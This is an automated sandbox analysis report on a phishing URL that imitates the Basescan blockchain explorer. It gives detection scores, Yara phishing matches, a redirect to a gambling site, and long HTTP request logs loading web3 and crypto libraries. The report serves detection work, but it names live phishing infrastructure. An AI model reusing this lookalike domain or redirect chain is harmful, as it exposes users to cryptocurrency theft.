Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/

Overview

General Information

Sample URL:http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
Analysis ID:1521025
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected HtmlPhish64
Detected suspicious crossdomain redirect
Found iframes
HTML body with high number of embedded images detected
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5260 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
66.76..script.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
    65.75..script.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
      118.130..script.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
        199.220..script.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
          52.62..script.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
            Click to see the 72 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devVirustotal: Detection: 18%Perma Link
            Source: http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Virustotal: Detection: 18%Perma Link
            Source: chromecache_742.2.drBinary or memory string: "\n")+"-----END RSA PRIVATE KEY-----"};H.prototype.getPublicKey=function(){return"-----BEGIN PUBLIC KEY-----\n"+(this.wordwrap(this.getPublicBaseKeyB64())+"\n")+"-----END PUBLIC KEY-----"};H.prototype.hasPublicKeyProperty=function(a){a=a||{};return a.hasOwnProperty("n")&&a.hasOwnProperty("e")};H.prototype.hasPrivateKeyProperty=function(a){a=a||{};return a.hasOwnProperty("n")&&a.hasOwnProperty("e")&&a.hasOwnProperty("d")&&a.hasOwnProperty("p")&&a.hasOwnProperty("q")&&a.hasOwnProperty("dmp1")&&a.hasOwnProperty("dmq1")&&memstr_c6130ed6-8

            Phishing

            barindex
            Source: Yara matchFile source: 66.76..script.csv, type: HTML
            Source: Yara matchFile source: 65.75..script.csv, type: HTML
            Source: Yara matchFile source: 118.130..script.csv, type: HTML
            Source: Yara matchFile source: 199.220..script.csv, type: HTML
            Source: Yara matchFile source: 52.62..script.csv, type: HTML
            Source: Yara matchFile source: 84.94..script.csv, type: HTML
            Source: Yara matchFile source: 57.67..script.csv, type: HTML
            Source: Yara matchFile source: 80.90..script.csv, type: HTML
            Source: Yara matchFile source: 81.91..script.csv, type: HTML
            Source: Yara matchFile source: 76.86..script.csv, type: HTML
            Source: Yara matchFile source: 174.186..script.csv, type: HTML
            Source: Yara matchFile source: 49.59..script.csv, type: HTML
            Source: Yara matchFile source: 61.71..script.csv, type: HTML
            Source: Yara matchFile source: 151.163..script.csv, type: HTML
            Source: Yara matchFile source: 70.80..script.csv, type: HTML
            Source: Yara matchFile source: 224.246..script.csv, type: HTML
            Source: Yara matchFile source: 226.248..script.csv, type: HTML
            Source: Yara matchFile source: 190.202..script.csv, type: HTML
            Source: Yara matchFile source: 92.102..script.csv, type: HTML
            Source: Yara matchFile source: 103.113..script.csv, type: HTML
            Source: Yara matchFile source: 89.99..script.csv, type: HTML
            Source: Yara matchFile source: 82.92..script.csv, type: HTML
            Source: Yara matchFile source: 62.72..script.csv, type: HTML
            Source: Yara matchFile source: 74.84..script.csv, type: HTML
            Source: Yara matchFile source: 72.82..script.csv, type: HTML
            Source: Yara matchFile source: 86.96..script.csv, type: HTML
            Source: Yara matchFile source: 85.95..script.csv, type: HTML
            Source: Yara matchFile source: 47.57..script.csv, type: HTML
            Source: Yara matchFile source: 53.63..script.csv, type: HTML
            Source: Yara matchFile source: 43.53..script.csv, type: HTML
            Source: Yara matchFile source: 191.203..script.csv, type: HTML
            Source: Yara matchFile source: 196.208..script.csv, type: HTML
            Source: Yara matchFile source: 71.81..script.csv, type: HTML
            Source: Yara matchFile source: 68.78..script.csv, type: HTML
            Source: Yara matchFile source: 46.56..script.csv, type: HTML
            Source: Yara matchFile source: 97.107..script.csv, type: HTML
            Source: Yara matchFile source: 96.106..script.csv, type: HTML
            Source: Yara matchFile source: 59.69..script.csv, type: HTML
            Source: Yara matchFile source: 132.144..script.csv, type: HTML
            Source: Yara matchFile source: 5.14.id.script.csv, type: HTML
            Source: Yara matchFile source: 73.83..script.csv, type: HTML
            Source: Yara matchFile source: 51.61..script.csv, type: HTML
            Source: Yara matchFile source: 117.129..script.csv, type: HTML
            Source: Yara matchFile source: 152.164..script.csv, type: HTML
            Source: Yara matchFile source: 77.87..script.csv, type: HTML
            Source: Yara matchFile source: 54.64..script.csv, type: HTML
            Source: Yara matchFile source: 198.219..script.csv, type: HTML
            Source: Yara matchFile source: 48.58..script.csv, type: HTML
            Source: Yara matchFile source: 60.70..script.csv, type: HTML
            Source: Yara matchFile source: 209.230..script.csv, type: HTML
            Source: Yara matchFile source: 223.245..script.csv, type: HTML
            Source: Yara matchFile source: 222.244..script.csv, type: HTML
            Source: Yara matchFile source: 218.240..script.csv, type: HTML
            Source: Yara matchFile source: 216.238..script.csv, type: HTML
            Source: Yara matchFile source: 58.68..script.csv, type: HTML
            Source: Yara matchFile source: 78.88..script.csv, type: HTML
            Source: Yara matchFile source: 64.74..script.csv, type: HTML
            Source: Yara matchFile source: 90.100..script.csv, type: HTML
            Source: Yara matchFile source: 3.17.pages.csv, type: HTML
            Source: Yara matchFile source: 3.23.pages.csv, type: HTML
            Source: Yara matchFile source: 3.27.pages.csv, type: HTML
            Source: Yara matchFile source: 3.15.pages.csv, type: HTML
            Source: Yara matchFile source: 3.18.pages.csv, type: HTML
            Source: Yara matchFile source: 3.9.pages.csv, type: HTML
            Source: Yara matchFile source: 3.12.pages.csv, type: HTML
            Source: Yara matchFile source: 3.10.pages.csv, type: HTML
            Source: Yara matchFile source: 3.21.pages.csv, type: HTML
            Source: Yara matchFile source: 3.3.pages.csv, type: HTML
            Source: Yara matchFile source: 3.8.pages.csv, type: HTML
            Source: Yara matchFile source: 3.5.pages.csv, type: HTML
            Source: Yara matchFile source: 3.16.pages.csv, type: HTML
            Source: Yara matchFile source: 3.6.pages.csv, type: HTML
            Source: Yara matchFile source: 3.4.pages.csv, type: HTML
            Source: Yara matchFile source: 3.13.pages.csv, type: HTML
            Source: Yara matchFile source: 3.11.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 3.1.pages.csv, type: HTML
            Source: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/HTTP Parser: Iframe src: /token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1
            Source: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/HTTP Parser: Total embedded image size: 347954
            Source: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nHTTP Parser: No favicon
            Source: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nHTTP Parser: No favicon
            Source: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nHTTP Parser: No favicon
            Source: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/HTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: goto.etherscan.com to https://bcgame.sk/i-p3uc729n-n/?spin=true
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/3.1.2/rollups/aes.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/3.1.2/rollups/aes.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /npm/web3@1.10.0/dist/web3.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dist/website HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/animate.css/animate.min.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/hs-megamenu/src/hs.megamenu.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/select2/dist/css/select2.min.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
